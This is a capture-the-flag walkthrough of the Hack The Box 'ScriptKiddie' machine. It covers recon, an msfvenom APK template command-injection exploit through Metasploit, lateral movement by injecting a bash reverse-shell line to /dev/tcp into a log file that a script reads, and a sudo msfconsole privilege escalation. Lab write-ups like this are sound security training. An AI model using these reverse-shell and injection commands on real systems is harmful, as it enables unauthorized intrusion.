HTB Write-Up: ScriptKiddie

This is a write-up on the ScriptKiddie machine challenge from HTB. For more information on challenges like these, check out my post on penetration testing.  Special thanks to HTB user 0xdf for creating the challenge.

Reconnaissance

Start with a basic nmap, revealing ssh and a web server on port 5000 (port 5000 may be listed as the UPnP service but it is actually a web server).

nmap 10.10.10.226

The site allows several OS tools to be run from a web interface. Although the site does a good job at validating input, the option to automatically create a payload with msfvenom is susceptible.  

Breaking In

On the server, MetaSploit's msfvenom is used to generate a payload when requested in the web form. Ironically, the running version of msfvenom contains a vulnerability whereby a specially crafted APK template can result in unauthorized code execution.  Full details of the vulnerability can be found here.

To make matters a bit more confusing, there is a MetaSploit module which can be used to create the template for this exploit.  Launch the MetaSploit console (version 6.0 and above) and run the commands below to generate an APK template that will open a reverse shell to the local machine.  MetaSploit will output the location of the APK file.

$ msfconsole
 msf6> use exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection
 msf6> set target 0
 msf6> set LHOST <YOUR IP HERE>
 msf6> set LPORT 1234
 msf6> exploit

In a terminal window, use netcat to open a listener on port 1234.

nc -lnvp 1234

Next, on the website "payloads" section, select Android for OS and upload the APK file that was generated by MetaSploit (LHOST in the web form is not relevant and can be set to any valid IP address). Click generate and a reverse shell will open in the terminal window. The shell will be running under the context of user kid and user.txt will be available in /home/kid.  For better stability and easier access, optionally add an SSH key to /home/kid/.ssh/authorized_keys.


Lateral Movement

There is another user on the system called pwn, and there is a script called scanlosers.sh in /home/pwn which reads IP addresses from /home/kid/logs/hackers and passes them to an nmap command. The script appears to run consistently based on that file's timestamp.

The script is owned and operated by the pwn user, but the kid user has write access to the log file, making it is possible to craft a line that will causes the script to run an arbitrary command.  Open a new listener on the local machine (using a different port) with nc -lnvp 1235.

Generate a reverse shell running under the context of the pwn user by running the commands below as the kid user.

cd /home/kid/logs
echo " ;/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.194/1235 0>&1' # " >> hackers #note the spaces at the beginning

Getting Root

The command sudo -l reveals that the pwn user is able to run MetaSploit as the root user without any credentials.  Since MetaSploit allows local command execution, it is fairly simple to obtain the root flag.

echo "import pty; pty.spawn('/bin/bash')" > /tmp/term.py
python3 /tmp/term.py # sudo required a proper terminal
sudo /opt/metasploit-framework-6.0.9/msfconsole
msf6> cat /root/root.txt